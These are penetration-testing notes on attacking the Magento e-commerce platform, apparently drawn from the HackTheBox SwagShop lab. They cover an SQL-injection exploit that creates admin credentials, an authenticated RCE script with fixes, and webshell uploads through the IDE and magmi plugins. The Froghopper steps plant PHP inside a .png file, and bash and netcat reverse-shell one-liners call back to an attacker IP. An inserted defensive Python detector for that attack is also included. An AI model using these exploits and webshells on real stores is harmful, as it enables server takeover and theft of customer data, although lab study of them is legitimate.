Magento

Last updated 2 years ago

Magento CMS

  • https://magento.com

  • Magento is an open-source e-commerce platform written in PHP

Scan

  • Magescan

  • Find version, files, etc. (app/etc/local.xml may contain database credentials)

  • Find the Admin page: http://10.x.x.x/index.php/admin

> php magescan.phar scan:all 10.x.x.x

Create Admin

  • RCE 37977

  • Magento eCommerce- Remote code Execution-37977.py

  • Creates admin credentials through a SQL injection

searchsploit magento
Magento eCommerce - Remote Code Execution - 37977.py
vi 37977.py
target = "http://10.x.x.x/"
target_url = target + "/index.php/admin/CmsWysiwyg/directive/index/"

python 37977.py
http://swagshop.htb/index.php/admin/
Gives us admin credentials:
forme:forme

Authenticated RCE 37811

  • Must have Admin User/Pass for this to work

  • Must have install_date from '/app/etc/local.xml'

  • Needs several tweaks before it runs; the errors hit and the fixes are listed below

-------------------
Authenticated RCE: 37811.py
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution

vi 37811.py
username='forme'
password='forme'
install_date='Wed, 08 May 2019...'      ..from local.xml

-------------------
Errors:
ippsec passed the full admin page path (not just the host) as the URL:
python exec.py http://10.x.x.x/index.php/admin/ 'whoami'

-------------------
Other write-ups replaced the login form handling with:
userone = br.find_control(name="login[username]", nr=0)
userone.value = username
pwdone = br.find_control(name="login[password]", nr=0)
pwdone.value = password

-------------------
More errors; the period in the tab_orders URL had to change from 72 to 2y:
request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)
-------------------
python 37811.py http://$IP "whoami"                     ..error
python 37811.py http://$IP/index.php/admin/ "whoami"    ..better
python 37811.py http://$IP/index.php/admin/ "bash -c 'bash -i >& /dev/tcp/10.x.x.x/9001 0>&1'"

nc -nvlp 5555
whoami
www-data

Upload IDE

  • Requires Admin login

  • System > Magento Connect > Magento Connection Manager > Upload

---------------
http://$IP/index.php/admin/ 
Login with Admin

System > Magento Connect > Magento Connection Manager

Check Box: Put store on the maintenance mode while installing
Direct Package File Upload > Browse
Magpleasure_Filesystem-1.0.0.tgz
Upload!
Download the package from:
http://connect20.magentocommerce.com/community/Magpleasure_Filesystem/1.0.0/Magpleasure_Filesystem-1.0.0.tgz

---------------
System > Filesystem > IDE
Edit "Cron.php" 
Update it with an evil php webshell

Get your shell
http://10.x.x.x/cron.php

Submit a python reverse shell
nc -nvlp 4444
whoami
www-data

Froghopper Attack (RCE)

  • Requires Admin login

  • Upload a .png that carries PHP code

  • Enable Symlinks

  • Edit Newsletter to call the payload

http://swagshop.htb/index.php/admin/ 
Login with Admin

-------------------
Create evil png

echo '<?php' >> shell.php.png
echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 >/tmp/f");' >> shell.php.png
echo '?>' >> shell.php.png

-------------------
System > Configuration > Advanced > Developer > Template Settings
Allow Symlinks: "Yes"

-------------------
Catalog > Manage
New Category > Manage Categories > Categories > Catalog
Thumbnail Image: Browse "shell.php.png"
http://10.x.x.x/media/catalog/category/shell.php.png   ..confirm it worked!

-------------------
Newsletter > Edit Newsletter Template
Add our code block to the "Template Content"
Save Template
Preview Template (to execute)
{{block type='core/template' template='../../../../../../media/catalog/category/shell.php.png'}}

-------------------
Previewing the template renders the 'symlinked' template path, which is the uploaded png

nc -nvlp 4444
whoami
www-data
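A defender-side check for the Froghopper chain above, added here (it is not from the original page or from any Magento tool): it flags template text that embeds a {{block}} directive whose template path traverses upward or does not end in .phtml, and image-named files under media/ that are really PHP. It assumes the newsletter template text has been exported from the database and that the media directory is readable; the sample inputs are constructed.

```python
import re
from pathlib import Path

# Straight and curly quotes: directives pasted from write-ups often carry ’ instead of '.
_Q = "'\"\u2018\u2019"
BLOCK_DIRECTIVE = re.compile(r"\{\{\s*block\b([^}]*)\}\}", re.IGNORECASE)
TEMPLATE_ARG = re.compile(r"template\s*=\s*[" + _Q + r"]?([^" + _Q + r"\s}]+)")
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif"}


def suspicious_block_directives(template_text: str) -> list:
    """Return the template= paths of {{block ...}} directives that either traverse
    upward with '..' or do not point at a .phtml file (the Froghopper pattern)."""
    hits = []
    for m in BLOCK_DIRECTIVE.finditer(template_text):
        arg = TEMPLATE_ARG.search(m.group(1))
        if arg is None:
            continue
        path = arg.group(1)
        if ".." in path or not path.lower().endswith(".phtml"):
            hits.append(path)
    return hits


def is_php_polyglot(name: str, data: bytes) -> bool:
    """True for an image-named upload that is really PHP: a double extension such as
    shell.php.png, or a PHP open tag anywhere in the bytes."""
    if Path(name).suffix.lower() not in IMAGE_EXTS:
        return False
    double_ext = ".php." in name.lower()
    has_php_tag = b"<?php" in data or b"<?=" in data
    return double_ext or has_php_tag


def scan_media_dir(media_dir: Path) -> list:
    """Walk media/catalog/category (or any upload tree) and list polyglot files."""
    return [f for f in media_dir.rglob("*")
            if f.is_file() and is_php_polyglot(f.name, f.read_bytes())]


if __name__ == "__main__":
    # Constructed sample template text mirroring the directive used above.
    sample = ("<p>Hello {{var subscriber.getName()}}</p>"
              "{{block type='core/template' "
              "template='../../../../../../media/catalog/category/shell.php.png'}}")
    print(suspicious_block_directives(sample))
    print(is_php_polyglot("shell.php.png", b"<?php echo 'constructed sample'; ?>"))
```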

Upload Evil Plugin

  • Requires Admin login

  • Magento (magmi) plugins are basically a PHP file zipped up.

  • Did not work on SwagShop (HTB)

http://$IP/magmi/web/magmi.php
http://$IP/index.php/admin/Cms_Wysiwyg/directive/index/
http://$IP/index.php/admin/Cms_Wysiwyg/directive/key/905d7.../

-------------------
vi evil.php

<?php
if (isset($_POST['command'])) {
    echo "<form action='evil.php' method='post'>
          <input type='text' name='command' value=''/>
          <input type='submit' value='execute'/>
          </form>";

    if (function_exists('shell_exec')) {
        $command = $_POST['command'];
        $output = shell_exec("$command");
        echo "<pre>$output</pre>";
    }
} else {
    echo "<form action='evil.php' method='post'>
          <input type='text' name='command' value=''/>
          <input type='submit' value='execute'/>
          </form>";
}
?>

-------------------
> zip evil.zip evil.php

Upload new plugins:
click on "choose file" > evil.zip
 
-------------------
Execute:
http://10.x.x.x/magmi/plugins/evil.php

Links:
https://magento.com/blog/magento-news/magento-community-edition-1.9.1-now-available-download
https://docs.magento.com/m1/ce/user_guide/configuration/url-admin-custom.html
https://github.com/steverobbins/magescan
https://joshuasuren.medium.com/hack-the-box-swagshop-write-up-18-1c18fecf885a
Magpleasure_Filesystem-1.0.0.tgz
https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper